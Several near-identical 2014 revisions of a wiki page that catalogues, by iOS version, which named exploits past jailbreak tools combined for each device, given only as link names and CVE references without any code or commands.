* [[Malformed CFF Vulnerability]] + [[Incomplete Codesign Exploit]] + [[IOSurface Kernel Exploit]] (all devices, used in [[Star]])<br />
<br />
=== 3.2 ===<br />
* [[MobileBackup Copy Exploit]] + [[Incomplete Codesign Exploit]] + [[BPF_STX Kernel Write Exploit]] (all devices, used in [[Spirit]])<br />
* [[Malformed CFF Vulnerability]] + [[Incomplete Codesign Exploit]] + [[IOSurface Kernel Exploit]] ([[k48ap|iPad]], used in [[Star]])<br />
* [[Limera1n Exploit]] + [[Incomplete Codesign Exploit]] + [[BPF_STX Kernel Write Exploit]] ([[K48ap|iPad]] used in [[sn0wbreeze]] 2.9.x)<br />
=== 3.2.1 ===<br />
* [[Malformed CFF Vulnerability]] + [[Incomplete Codesign Exploit]] + [[IOSurface Kernel Exploit]] ([[k48ap|iPad]], used in [[Star]])<br />
* [[Limera1n Exploit]] + [[Incomplete Codesign Exploit]] + [[IOSurface Kernel Exploit]] ([[k48ap|iPad]], used in [[sn0wbreeze]] 2.9.x)<br />
=== 3.2.2 ===<br />
* [[Limera1n Exploit]] + [[Packet Filter Kernel Exploit]] ([[k48ap|iPad]])<br />
<br />
== Exploits which are used in order to jailbreak 4.x ==<br />
=== 4.0 / 4.0.1 ===<br />
* [[Pwnage]] + [[Pwnage 2.0]] ([[n82ap|iPhone 3G]])<br />
* [[0x24000 Segment Overflow]] ([[n72ap|iPod touch 2G]] and [[n88ap|iPhone 3GS]] devices with older bootroms)<br />
* [[Malformed CFF Vulnerability]] + [[Incomplete Codesign Exploit]] + [[IOSurface Kernel Exploit]] (all devices, used in [[Star]])<br />
* [[Limera1n Exploit]] + [[Packet Filter Kernel Exploit]] ([[n88ap|iPhone 3GS]] New bootrom, [[N18ap|iPod touch 3G]], [[n90ap|iPhone 4 (iPhone3,1)]])<br />
<br />
=== 4.0.2 ===<br />
* [[Pwnage]] + [[Pwnage 2.0]] ([[n82ap|iPhone 3G]])<br />
* [[ARM7 Go]] (from iOS 2.1.1) + [[0x24000 Segment Overflow]] ([[n72ap|iPod touch 2G]])<br />
* [[0x24000 Segment Overflow]] ([[n88ap|iPhone 3GS]])<br />
* [[limera1n]]'s bootrom exploit + [[Packet Filter Kernel Exploit]] ([[n88ap|iPhone 3GS]] [[Bootrom 359.3.2|new bootrom]], [[n18ap|iPod touch 3G]], [[n90ap|iPhone 4 (iPhone3,1)]], and [[n81ap|iPod touch 4G]])<br />
<br />
=== 4.1 ===<br />
* [[Pwnage]] + [[Pwnage 2.0]] (together to jailbreak the [[n82ap|iPhone 3G]])<br />
* [[ARM7 Go]] (from iOS 2.1.1) + [[0x24000 Segment Overflow]] (together for [[untethered jailbreak]] on [[n72ap|iPod touch 2G]] [[Bootrom 240.4|old bootrom]])<br />
* [[limera1n]]'s bootrom exploit + [[0x24000 Segment Overflow]] (together for [[untethered jailbreak]] on [[n88ap|iPhone 3GS]] [[Bootrom 359.3|old bootrom]])<br />
* [[limera1n]]'s bootrom exploit + [[Packet Filter Kernel Exploit]] (together for [[untethered jailbreak]] on [[n88ap|iPhone 3GS]] [[Bootrom 359.3.2|new bootrom]], [[n18ap|iPod touch 3G]], [[n90ap|iPhone 4 (iPhone3,1)]], [[n81ap|iPod touch 4G]], and [[k66ap|Apple TV 2G]]))<br />
* [[usb_control_msg(0xA1, 1) Exploit]] + [[Packet Filter Kernel Exploit]] (together for [[untethered jailbreak]] on [[n72ap|iPod touch 2G]])<br />
<br />
=== 4.2.1 ===<br />
* [[Pwnage]] + [[Pwnage 2.0]] (together to jailbreak the [[n82ap|iPhone 3G]])<br />
* [[ARM7 Go]] (from iOS 2.1.1) + [[0x24000 Segment Overflow]] (together for [[untethered jailbreak]] on [[n72ap|iPod touch 2G]] [[Bootrom 240.4|old bootrom]])<br />
* [[limera1n]]'s bootrom exploit + [[0x24000 Segment Overflow]] (together for [[untethered jailbreak]] on [[n88ap|iPhone 3GS]] [[Bootrom 359.3|old bootrom]])<br />
* [[limera1n]]'s bootrom exploit + [[HFS Legacy Volume Name Stack Buffer Overflow]] (together for [[untethered jailbreak]] on [[n88ap|iPhone 3GS]] [[Bootrom 359.3.2|new bootrom]], [[n18ap|iPod touch 3G]], [[k48ap|iPad]], [[n90ap|iPhone 4 (iPhone3,1)]], [[n81ap|iPod touch 4G]], and [[k66ap|Apple TV 2G]])<br />
* [[usb_control_msg(0xA1, 1) Exploit]] + [[HFS Legacy Volume Name Stack Buffer Overflow]] (together for [[untethered jailbreak]] on [[n72ap|iPod touch 2G]])<br />
<br />
=== 4.2.6 / 4.2.7 / 4.2.8 ===<br />
* [[limera1n]]'s bootrom exploit + [[HFS Legacy Volume Name Stack Buffer Overflow]] (together for [[untethered jailbreak]] on [[n92ap|iPhone 4 (iPhone3,3)]])<br />
* [[T1 Font Integer Overflow]] (used for [[Saffron]])<br />
<br />
=== 4.2.9 / 4.2.10 ===<br />
* [[limera1n]]'s bootrom exploit (Tethered jailbreak on [[n92ap|iPhone 4 (iPhone3,3)]])<br />
<br />
=== 4.3 ===<br />
* [[limera1n]]'s bootrom exploit + [[0x24000 Segment Overflow]] (together for [[untethered jailbreak]] on [[n88ap|iPhone 3GS]] [[Bootrom 359.3|old bootrom]])<br />
* [[limera1n]]'s bootrom exploit ([[tethered jailbreak]] on [[n88ap|iPhone 3GS]] [[Bootrom 359.3.2|new bootrom]], [[n18ap|iPod touch 3G]], [[k48ap|iPad]], [[n90ap|iPhone 4 (iPhone3,1)]], [[n81ap|iPod touch 4G]], and [[k66ap|Apple TV 2G]])<br />
* [[T1 Font Integer Overflow]] (used for [[Saffron]])<br />
<br />
=== 4.3.1 / 4.3.2 / 4.3.3 ===<br />
* [[limera1n]]'s bootrom exploit + [[0x24000 Segment Overflow]] (together for [[untethered jailbreak]] on [[n88ap|iPhone 3GS]] [[Bootrom 359.3|old bootrom]])<br />
* [[limera1n]]'s bootrom exploit + [[ndrv_setspec() Integer Overflow]] (together for [[untethered jailbreak]] on [[n88ap|iPhone 3GS]] [[Bootrom 359.3.2|new bootrom]], [[n18ap|iPod touch 3G]], [[k48ap|iPad]], [[n90ap|iPhone 4 (iPhone3,1)]], and [[n81ap|iPod touch 4G]])<br />
* [[T1 Font Integer Overflow]] (used for [[Saffron]])<br />
<br />
=== 4.3.4 / 4.3.5 ===<br />
* [[limera1n]]'s bootrom exploit + [[0x24000 Segment Overflow]] (together for [[untethered jailbreak]] on [[n88ap|iPhone 3GS]] with [[Bootrom 359.3|old bootrom]])<br />
* [[limera1n]]'s bootrom exploit (Tethered jailbreak) on [[n88ap|iPhone 3GS]] with [[Bootrom 359.3.2|new bootrom]], [[n18ap|iPod touch 3G]], [[k48ap|iPad]], [[n90ap|iPhone 4 (iPhone3,1)]], and [[n81ap|iPod touch 4G]])<br />
<br />
== Exploits which are used in order to jailbreak 5.x ==<br />
=== 5.0 ===<br />
* [[limera1n]]'s bootrom exploit + [[0x24000 Segment Overflow]] (together for [[untethered jailbreak]] on [[n88ap|iPhone 3GS]] with [[Bootrom 359.3|old bootrom]])<br />
* [[limera1n]]'s bootrom exploit (Tethered jailbreak) on [[n88ap|iPhone 3GS]] with [[Bootrom 359.3.2|new bootrom]], [[n18ap|iPod touch 3G]], [[k48ap|iPad]], [[iPhone 4]], and [[n81ap|iPod touch 4G]])<br />
* [[Racoon String Format Overflow Exploit]] (used both for payload injection and untether)+[[HFS Heap Overflow]]- [[n94ap|iPhone 4S]] only<br />
<br />
===5.0.1===<br />
* [[limera1n]]'s bootrom exploit + [[0x24000 Segment Overflow]] (together for [[untethered jailbreak]] on [[n88ap|iPhone 3GS]] with [[Bootrom 359.3|old bootrom]])<br />
* [[limera1n]]'s bootrom exploit + [[Racoon String Format Overflow Exploit]]+[[HFS Heap Overflow]] on [[n88ap|iPhone 3GS]] with [[Bootrom 359.3.2|new bootrom]], [[n18ap|iPod touch 3G]], [[k48ap|iPad]], [[iPhone 4]], and [[n81ap|iPod touch 4G]])<br />
* [[Racoon String Format Overflow Exploit]] (used both for payload injection and untether)+[[HFS Heap Overflow]] - [[iPad 2]] and [[iPhone 4S]] with [[Absinthe]]<br />
<br />
===5.1===<br />
* [[limera1n]]'s bootrom exploit (Tethered jailbreak) on [[n88ap|iPhone 3GS]] with [[Bootrom 359.3.2|new bootrom]], [[n18ap|iPod touch 3G]], [[k48ap|iPad]], [[iPhone 4]], and [[n81ap|iPod touch 4G]])<br />
* [[limera1n]]'s bootrom exploit + [[0x24000 Segment Overflow]] (together for [[untethered jailbreak]] on [[n88ap|iPhone 3GS]] with [[Bootrom 359.3|old bootrom]])<br />
<br />
===5.1.1===<br />
* [[limera1n Exploit]] + [[0x24000 Segment Overflow]] (together for [[untethered jailbreak]] on [[n88ap|iPhone 3GS]] with [[Bootrom 359.3|old bootrom]])<br />
* [[limera1n Exploit]] + [[Rocky Racoon]] (together for [[untethered jailbreak]] on [[n88ap|iPhone 3GS]] with [[Bootrom 359.3.2|new bootrom]], [[iPhone 4]], [[n18ap|iPod touch 3G]], and [[n81ap|iPod touch 4G]])<br />
<br />
== Exploits which are used in order to jailbreak 6.x ==<br />
=== 6.0 / 6.0.1 / 6.0.2 / 6.1 / 6.1.1 / 6.1.2 ===<br />
* [[limera1n]]'s bootrom exploit (Tethered jailbreak) on [[n88ap|iPhone 3GS]] with [[Bootrom 359.3.2|new bootrom]], [[iPhone 4]], and [[n81ap|iPod touch 4G]])<br />
* [[limera1n]]'s bootrom exploit + [[0x24000 Segment Overflow]] (together for [[untethered jailbreak]] on [[n88ap|iPhone 3GS]] with [[Bootrom 359.3|old bootrom]])<br />
* [[Symbolic Link Vulnerability]]<br />
* [[Timezone Vulnerability]]<br />
* [[Shebang Trick]]<br />
* [[AMFID code signing evasion]]<br />
* [[launchd.conf untether]]<br />
* [[IOUSBDeviceFamily Vulnerability]]<br />
* [[ARM Exception Vector Info Leak]]<br />
* [[dynamic memmove() locating]]<br />
* [[vm_map_copy_t corruption for arbitrary memory disclosure]]<br />
* [[kernel memory write via ROP gadget]]<br />
<br />
=== 6.1.3 / 6.1.4 / 6.1.5 / 6.1.6 ===<br />
*[[Symbolic_Link_Vulnerability]] (Used by [[p0sixspwn]] to write to the file system in /var, also used in [[evasi0n]] and [[evasi0n7]])<br />
*[[launchd.conf untether]]<br />
*[[AMFID_code_signing_evasion]]<br />
*[[posix_spawn kernel information leak]]<br />
*[Other exploits?]<br />
<br />
== Exploits which are used in order to jailbreak 7.x ==<br />
=== 7.0 / 7.0.1 / 7.0.2 / 7.0.3 / 7.0.4 / 7.0.5 / 7.0.6 ===<br />
* [http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5133 CVE-2013-5133]<br />
* [http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1272 CVE-2014-1272]<br />
* [http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1273 CVE-2014-1273]<br />
* [http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3948 CVE-2013-3948]<br />
* [http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1278 CVE-2014-1278]<br />
<br />
=== 7.1 / 7.1.1 ===<br />
*[[limera1n]]'s bootrom exploit ([[Tethered jailbreak]]) on [[iPhone 4]]</div>
Ryandolan123
https://www.theiphonewiki.com/w/index.php?title=Jailbreak_Exploits&diff=41042
Jailbreak Exploits
2014-05-06T01:09:26Z
<p>Ryandolan123: /* 6.1.3 / 6.1.4 / 6.1.5 / 6.1.6 */</p>
<hr />
<div>This page lists the exploits used in [[Jailbreak]]s.<br />
== Exploits which were used in order to jailbreak 1.x ==<br />
=== 1.0.2 ===<br />
* [[Restore Mode]] ([[iBoot (Bootloader)|iBoot]] had a command named cp, which had access to the whole filesystem)<br />
=== 1.1.1 ===<br />
* [[Symlinks]] (an upgrade jailbreak)<br />
* [[LibTiff|libtiff exploit]] (Adapted from the PSP scene, used by [[JailbreakMe]])<br />
=== 1.1.2 ===<br />
* [[Mknod]] (an upgrade jailbreak)<br />
=== 1.1.3 / 1.1.4 / 1.1.5 ===<br />
* [[Soft Upgrade]] (an upgrade jailbreak)<br />
* [[Ramdisk Hack]]<br />
* [[Dual Boot Exploit]] - Works up to [[iOS]] 2.0 beta 3<br />
* [[diags]] - Works up to [[iOS]] 2.0 beta 5<br />
<br />
== Exploits which are used in order to jailbreak 2.x ==<br />
=== 2.0 / 2.0.1 / 2.0.2 / 2.1 ===<br />
* [[Pwnage]] + [[Pwnage 2.0]]<br />
=== 2.1.1 ===<br />
* [[ARM7 Go]] ([[tethered jailbreak]])<br />
=== 2.2 ===<br />
* [[Pwnage]] + [[Pwnage 2.0]] ([[m68ap|iPhone]], [[n45ap|iPod touch]], and [[n82ap|iPhone 3G]])<br />
=== 2.2.1 ===<br />
* [[Pwnage]] + [[Pwnage 2.0]] ([[m68ap|iPhone]], [[n45ap|iPod touch]], and [[n82ap|iPhone 3G]])<br />
* [[0x24000 Segment Overflow]] + [[ARM7 Go]] (from iOS 2.1.1) ([[n72ap|iPod touch 2G]])<br />
<br />
== Exploits which are used in order to jailbreak 3.x ==<br />
=== 3.0 / 3.0.1 ===<br />
* [[Pwnage]] + [[Pwnage 2.0]] ([[m68ap|iPhone]], [[n45ap|iPod touch]], and [[n82ap|iPhone 3G]])<br />
* [[ARM7 Go]] (from iOS 2.1.1) + [[0x24000 Segment Overflow]] ( [[n72ap|iPod touch 2G]])<br />
* [[Pwnage]] + [[iBoot Environment Variable Overflow]] ([[m68ap|iPhone]], [[n45ap|iPod touch]], and [[n82ap|iPhone 3G]])<br />
* [[0x24000 Segment Overflow]] + [[iBoot Environment Variable Overflow]] ([[n72ap|iPod touch 2G]] and [[n88ap|iPhone 3GS]])<br />
=== 3.1 / 3.1.1 ===<br />
* [[Pwnage]] + [[Pwnage 2.0]] (together for [[untethered jailbreak]] on [[m68ap|iPhone]], [[n45ap|iPod touch]], and [[n82ap|iPhone 3G]])<br />
* [[usb_control_msg(0x21, 2) Exploit]] ([[tethered jailbreak]] on [[n72ap|iPod touch 2G]] [[Bootrom 240.5.1|new bootrom]], [[n88ap|iPhone 3GS]] [[Bootrom 359.3.2|new bootrom]], and [[n18ap|iPod touch 3G]])<br />
* [[0x24000 Segment Overflow]] + [[usb_control_msg(0x21, 2) Exploit]] ([[n72ap|iPod touch 2G]] [[Bootrom 240.4|old bootrom]] and [[n88ap|iPhone 3GS]] [[Bootrom 359.3|old bootrom]])<br />
=== 3.1.2 ===<br />
* [[Pwnage]] + [[Pwnage 2.0]] (together for [[untethered jailbreak]] on [[m68ap|iPhone]], [[n45ap|iPod touch]], and [[n82ap|iPhone 3G]])<br />
* [[usb_control_msg(0x21, 2) Exploit]] ([[tethered jailbreak]] on [[n72ap|iPod touch 2G]] [[Bootrom 240.5.1|new bootrom]], [[n88ap|iPhone 3GS]] [[Bootrom 359.3.2|new bootrom]], and [[n18ap|iPod touch 3G]])<br />
* [[0x24000 Segment Overflow]] + [[usb_control_msg(0x21, 2) Exploit]] ([[n72ap|iPod touch 2G]] [[Bootrom 240.4|old bootrom]] and [[n88ap|iPhone 3GS]] [[Bootrom 359.3|old bootrom]])<br />
* [[MobileBackup Copy Exploit]] + [[Incomplete Codesign Exploit]] + [[BPF_STX Kernel Write Exploit]] (all devices, used in [[Spirit]])<br />
* [[Malformed CFF Vulnerability]] + [[Incomplete Codesign Exploit]] + [[IOSurface Kernel Exploit]] (all devices, used in [[Star]])<br />
=== 3.1.3 ===<br />
* [[Pwnage]] + [[Pwnage 2.0]] (together for [[untethered jailbreak]] on [[m68ap|iPhone]], [[n45ap|iPod touch]], and [[n82ap|iPhone 3G]])<br />
* [[0x24000 Segment Overflow]] (for [[n72ap|iPod touch 2G]] and [[n88ap|iPhone 3GS]] devices with older bootroms)<br />
** + [[Limera1n Exploit]] ([[n88ap|iPhone 3GS]] [[Bootrom 359.3|old bootrom]], used in [[sn0wbreeze]])<br />
** + [[usb_control_msg(0xA1, 1) Exploit]] ([[n72ap|iPod touch 2G]] [[Bootrom 240.4|old bootrom]], used in [[sn0wbreeze]])<br />
* [[usb_control_msg(0xA1, 1) Exploit]]+ [[Incomplete Codesign Exploit]] + [[BPF_STX Kernel Write Exploit]] ([[n72ap|iPod touch 2G]] [[Bootrom 240.5.1|new bootrom]], used in [[sn0wbreeze]])<br />
* [[Limera1n Exploit]] + [[Incomplete Codesign Exploit]] + [[BPF_STX Kernel Write Exploit]] ([[N18ap|iPod touch 3G]] and [[n88ap|iPhone 3GS]] [[Bootrom 359.3.2|new bootrom]], used in [[sn0wbreeze]])<br />
* [[MobileBackup Copy Exploit]] + [[Incomplete Codesign Exploit]] + [[BPF_STX Kernel Write Exploit]] (all devices, used in [[Spirit]])<br />
* [[Malformed CFF Vulnerability]] + [[Incomplete Codesign Exploit]] + [[IOSurface Kernel Exploit]] (all devices, used in [[Star]])<br />
<br />
=== 3.2 ===<br />
* [[MobileBackup Copy Exploit]] + [[Incomplete Codesign Exploit]] + [[BPF_STX Kernel Write Exploit]] (all devices, used in [[Spirit]])<br />
* [[Malformed CFF Vulnerability]] + [[Incomplete Codesign Exploit]] + [[IOSurface Kernel Exploit]] ([[k48ap|iPad]], used in [[Star]])<br />
* [[Limera1n Exploit]] + [[Incomplete Codesign Exploit]] + [[BPF_STX Kernel Write Exploit]] ([[K48ap|iPad]] used in [[sn0wbreeze]] 2.9.x)<br />
=== 3.2.1 ===<br />
* [[Malformed CFF Vulnerability]] + [[Incomplete Codesign Exploit]] + [[IOSurface Kernel Exploit]] ([[k48ap|iPad]], used in [[Star]])<br />
* [[Limera1n Exploit]] + [[Incomplete Codesign Exploit]] + [[IOSurface Kernel Exploit]] ([[k48ap|iPad]], used in [[sn0wbreeze]] 2.9.x)<br />
=== 3.2.2 ===<br />
* [[Limera1n Exploit]] + [[Packet Filter Kernel Exploit]] ([[k48ap|iPad]])<br />
<br />
== Exploits which are used in order to jailbreak 4.x ==<br />
=== 4.0 / 4.0.1 ===<br />
* [[Pwnage]] + [[Pwnage 2.0]] ([[n82ap|iPhone 3G]])<br />
* [[0x24000 Segment Overflow]] ([[n72ap|iPod touch 2G]] and [[n88ap|iPhone 3GS]] devices with older bootroms)<br />
* [[Malformed CFF Vulnerability]] + [[Incomplete Codesign Exploit]] + [[IOSurface Kernel Exploit]] (all devices, used in [[Star]])<br />
* [[Limera1n Exploit]] + [[Packet Filter Kernel Exploit]] ([[n88ap|iPhone 3GS]] New bootrom, [[N18ap|iPod touch 3G]], [[n90ap|iPhone 4 (iPhone3,1)]])<br />
<br />
=== 4.0.2 ===<br />
* [[Pwnage]] + [[Pwnage 2.0]] ([[n82ap|iPhone 3G]])<br />
* [[ARM7 Go]] (from iOS 2.1.1) + [[0x24000 Segment Overflow]] ([[n72ap|iPod touch 2G]])<br />
* [[0x24000 Segment Overflow]] ([[n88ap|iPhone 3GS]])<br />
* [[limera1n]]'s bootrom exploit + [[Packet Filter Kernel Exploit]] ([[n88ap|iPhone 3GS]] [[Bootrom 359.3.2|new bootrom]], [[n18ap|iPod touch 3G]], [[n90ap|iPhone 4 (iPhone3,1)]], and [[n81ap|iPod touch 4G]])<br />
<br />
=== 4.1 ===<br />
* [[Pwnage]] + [[Pwnage 2.0]] (together to jailbreak the [[n82ap|iPhone 3G]])<br />
* [[ARM7 Go]] (from iOS 2.1.1) + [[0x24000 Segment Overflow]] (together for [[untethered jailbreak]] on [[n72ap|iPod touch 2G]] [[Bootrom 240.4|old bootrom]])<br />
* [[limera1n]]'s bootrom exploit + [[0x24000 Segment Overflow]] (together for [[untethered jailbreak]] on [[n88ap|iPhone 3GS]] [[Bootrom 359.3|old bootrom]])<br />
* [[limera1n]]'s bootrom exploit + [[Packet Filter Kernel Exploit]] (together for [[untethered jailbreak]] on [[n88ap|iPhone 3GS]] [[Bootrom 359.3.2|new bootrom]], [[n18ap|iPod touch 3G]], [[n90ap|iPhone 4 (iPhone3,1)]], [[n81ap|iPod touch 4G]], and [[k66ap|Apple TV 2G]]))<br />
* [[usb_control_msg(0xA1, 1) Exploit]] + [[Packet Filter Kernel Exploit]] (together for [[untethered jailbreak]] on [[n72ap|iPod touch 2G]])<br />
<br />
=== 4.2.1 ===<br />
* [[Pwnage]] + [[Pwnage 2.0]] (together to jailbreak the [[n82ap|iPhone 3G]])<br />
* [[ARM7 Go]] (from iOS 2.1.1) + [[0x24000 Segment Overflow]] (together for [[untethered jailbreak]] on [[n72ap|iPod touch 2G]] [[Bootrom 240.4|old bootrom]])<br />
* [[limera1n]]'s bootrom exploit + [[0x24000 Segment Overflow]] (together for [[untethered jailbreak]] on [[n88ap|iPhone 3GS]] [[Bootrom 359.3|old bootrom]])<br />
* [[limera1n]]'s bootrom exploit + [[HFS Legacy Volume Name Stack Buffer Overflow]] (together for [[untethered jailbreak]] on [[n88ap|iPhone 3GS]] [[Bootrom 359.3.2|new bootrom]], [[n18ap|iPod touch 3G]], [[k48ap|iPad]], [[n90ap|iPhone 4 (iPhone3,1)]], [[n81ap|iPod touch 4G]], and [[k66ap|Apple TV 2G]])<br />
* [[usb_control_msg(0xA1, 1) Exploit]] + [[HFS Legacy Volume Name Stack Buffer Overflow]] (together for [[untethered jailbreak]] on [[n72ap|iPod touch 2G]])<br />
<br />
=== 4.2.6 / 4.2.7 / 4.2.8 ===<br />
* [[limera1n]]'s bootrom exploit + [[HFS Legacy Volume Name Stack Buffer Overflow]] (together for [[untethered jailbreak]] on [[n92ap|iPhone 4 (iPhone3,3)]])<br />
* [[T1 Font Integer Overflow]] (used for [[Saffron]])<br />
<br />
=== 4.2.9 / 4.2.10 ===<br />
* [[limera1n]]'s bootrom exploit (Tethered jailbreak on [[n92ap|iPhone 4 (iPhone3,3)]])<br />
<br />
=== 4.3 ===<br />
* [[limera1n]]'s bootrom exploit + [[0x24000 Segment Overflow]] (together for [[untethered jailbreak]] on [[n88ap|iPhone 3GS]] [[Bootrom 359.3|old bootrom]])<br />
* [[limera1n]]'s bootrom exploit ([[tethered jailbreak]] on [[n88ap|iPhone 3GS]] [[Bootrom 359.3.2|new bootrom]], [[n18ap|iPod touch 3G]], [[k48ap|iPad]], [[n90ap|iPhone 4 (iPhone3,1)]], [[n81ap|iPod touch 4G]], and [[k66ap|Apple TV 2G]])<br />
* [[T1 Font Integer Overflow]] (used for [[Saffron]])<br />
<br />
=== 4.3.1 / 4.3.2 / 4.3.3 ===<br />
* [[limera1n]]'s bootrom exploit + [[0x24000 Segment Overflow]] (together for [[untethered jailbreak]] on [[n88ap|iPhone 3GS]] [[Bootrom 359.3|old bootrom]])<br />
* [[limera1n]]'s bootrom exploit + [[ndrv_setspec() Integer Overflow]] (together for [[untethered jailbreak]] on [[n88ap|iPhone 3GS]] [[Bootrom 359.3.2|new bootrom]], [[n18ap|iPod touch 3G]], [[k48ap|iPad]], [[n90ap|iPhone 4 (iPhone3,1)]], and [[n81ap|iPod touch 4G]])<br />
* [[T1 Font Integer Overflow]] (used for [[Saffron]])<br />
<br />
=== 4.3.4 / 4.3.5 ===<br />
* [[limera1n]]'s bootrom exploit + [[0x24000 Segment Overflow]] (together for [[untethered jailbreak]] on [[n88ap|iPhone 3GS]] with [[Bootrom 359.3|old bootrom]])<br />
* [[limera1n]]'s bootrom exploit (Tethered jailbreak) on [[n88ap|iPhone 3GS]] with [[Bootrom 359.3.2|new bootrom]], [[n18ap|iPod touch 3G]], [[k48ap|iPad]], [[n90ap|iPhone 4 (iPhone3,1)]], and [[n81ap|iPod touch 4G]])<br />
<br />
== Exploits which are used in order to jailbreak 5.x ==<br />
=== 5.0 ===<br />
* [[limera1n]]'s bootrom exploit + [[0x24000 Segment Overflow]] (together for [[untethered jailbreak]] on [[n88ap|iPhone 3GS]] with [[Bootrom 359.3|old bootrom]])<br />
* [[limera1n]]'s bootrom exploit (Tethered jailbreak) on [[n88ap|iPhone 3GS]] with [[Bootrom 359.3.2|new bootrom]], [[n18ap|iPod touch 3G]], [[k48ap|iPad]], [[iPhone 4]], and [[n81ap|iPod touch 4G]])<br />
* [[Racoon String Format Overflow Exploit]] (used both for payload injection and untether)+[[HFS Heap Overflow]]- [[n94ap|iPhone 4S]] only<br />
<br />
===5.0.1===<br />
* [[limera1n]]'s bootrom exploit + [[0x24000 Segment Overflow]] (together for [[untethered jailbreak]] on [[n88ap|iPhone 3GS]] with [[Bootrom 359.3|old bootrom]])<br />
* [[limera1n]]'s bootrom exploit + [[Racoon String Format Overflow Exploit]]+[[HFS Heap Overflow]] on [[n88ap|iPhone 3GS]] with [[Bootrom 359.3.2|new bootrom]], [[n18ap|iPod touch 3G]], [[k48ap|iPad]], [[iPhone 4]], and [[n81ap|iPod touch 4G]])<br />
* [[Racoon String Format Overflow Exploit]] (used both for payload injection and untether)+[[HFS Heap Overflow]] - [[iPad 2]] and [[iPhone 4S]] with [[Absinthe]]<br />
<br />
===5.1===<br />
* [[limera1n]]'s bootrom exploit (Tethered jailbreak) on [[n88ap|iPhone 3GS]] with [[Bootrom 359.3.2|new bootrom]], [[n18ap|iPod touch 3G]], [[k48ap|iPad]], [[iPhone 4]], and [[n81ap|iPod touch 4G]])<br />
* [[limera1n]]'s bootrom exploit + [[0x24000 Segment Overflow]] (together for [[untethered jailbreak]] on [[n88ap|iPhone 3GS]] with [[Bootrom 359.3|old bootrom]])<br />
<br />
===5.1.1===<br />
* [[limera1n Exploit]] + [[0x24000 Segment Overflow]] (together for [[untethered jailbreak]] on [[n88ap|iPhone 3GS]] with [[Bootrom 359.3|old bootrom]])<br />
* [[limera1n Exploit]] + [[Rocky Racoon]] (together for [[untethered jailbreak]] on [[n88ap|iPhone 3GS]] with [[Bootrom 359.3.2|new bootrom]], [[iPhone 4]], [[n18ap|iPod touch 3G]], and [[n81ap|iPod touch 4G]])<br />
<br />
== Exploits which are used in order to jailbreak 6.x ==<br />
=== 6.0 / 6.0.1 / 6.0.2 / 6.1 / 6.1.1 / 6.1.2 ===<br />
* [[limera1n]]'s bootrom exploit (Tethered jailbreak) on [[n88ap|iPhone 3GS]] with [[Bootrom 359.3.2|new bootrom]], [[iPhone 4]], and [[n81ap|iPod touch 4G]])<br />
* [[limera1n]]'s bootrom exploit + [[0x24000 Segment Overflow]] (together for [[untethered jailbreak]] on [[n88ap|iPhone 3GS]] with [[Bootrom 359.3|old bootrom]])<br />
* [[Symbolic Link Vulnerability]]<br />
* [[Timezone Vulnerability]]<br />
* [[Shebang Trick]]<br />
* [[AMFID code signing evasion]]<br />
* [[launchd.conf untether]]<br />
* [[IOUSBDeviceFamily Vulnerability]]<br />
* [[ARM Exception Vector Info Leak]]<br />
* [[dynamic memmove() locating]]<br />
* [[vm_map_copy_t corruption for arbitrary memory disclosure]]<br />
* [[kernel memory write via ROP gadget]]<br />
<br />
=== 6.1.3 / 6.1.4 / 6.1.5 / 6.1.6 ===<br />
*[[Symbolic_Link_Vulnerability]] (Used by [[p0sixspwn]] to write to the file system in /var, also used in [[evasi0n]] and [[evasi0n7]])<br />
*[[launchd.conf untether]]<br />
*[[AMFID_code_signing_evasion]]<br />
*[[posix_spawn kernel information leak]]<br />
[Other exploits?]<br />
<br />
== Exploits which are used in order to jailbreak 7.x ==<br />
=== 7.0 / 7.0.1 / 7.0.2 / 7.0.3 / 7.0.4 / 7.0.5 / 7.0.6 ===<br />
* [http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5133 CVE-2013-5133]<br />
* [http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1272 CVE-2014-1272]<br />
* [http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1273 CVE-2014-1273]<br />
* [http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3948 CVE-2013-3948]<br />
* [http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1278 CVE-2014-1278]<br />
<br />
=== 7.1 / 7.1.1 ===<br />
*[[limera1n]]'s bootrom exploit ([[Tethered jailbreak]]) on [[iPhone 4]]</div>
Ryandolan123
https://www.theiphonewiki.com/w/index.php?title=Jailbreak_Exploits&diff=41041
Jailbreak Exploits
2014-05-06T01:08:09Z
<p>Ryandolan123: /* 6.1.3 / 6.1.4 / 6.1.5 / 6.1.6 */</p>
<hr />
<div>This page lists the exploits used in [[Jailbreak]]s.<br />
== Exploits which were used in order to jailbreak 1.x ==<br />
=== 1.0.2 ===<br />
* [[Restore Mode]] ([[iBoot (Bootloader)|iBoot]] had a command named cp, which had access to the whole filesystem)<br />
=== 1.1.1 ===<br />
* [[Symlinks]] (an upgrade jailbreak)<br />
* [[LibTiff|libtiff exploit]] (Adapted from the PSP scene, used by [[JailbreakMe]])<br />
=== 1.1.2 ===<br />
* [[Mknod]] (an upgrade jailbreak)<br />
=== 1.1.3 / 1.1.4 / 1.1.5 ===<br />
* [[Soft Upgrade]] (an upgrade jailbreak)<br />
* [[Ramdisk Hack]]<br />
* [[Dual Boot Exploit]] - Works up to [[iOS]] 2.0 beta 3<br />
* [[diags]] - Works up to [[iOS]] 2.0 beta 5<br />
<br />
== Exploits which are used in order to jailbreak 2.x ==<br />
=== 2.0 / 2.0.1 / 2.0.2 / 2.1 ===<br />
* [[Pwnage]] + [[Pwnage 2.0]]<br />
=== 2.1.1 ===<br />
* [[ARM7 Go]] ([[tethered jailbreak]])<br />
=== 2.2 ===<br />
* [[Pwnage]] + [[Pwnage 2.0]] ([[m68ap|iPhone]], [[n45ap|iPod touch]], and [[n82ap|iPhone 3G]])<br />
=== 2.2.1 ===<br />
* [[Pwnage]] + [[Pwnage 2.0]] ([[m68ap|iPhone]], [[n45ap|iPod touch]], and [[n82ap|iPhone 3G]])<br />
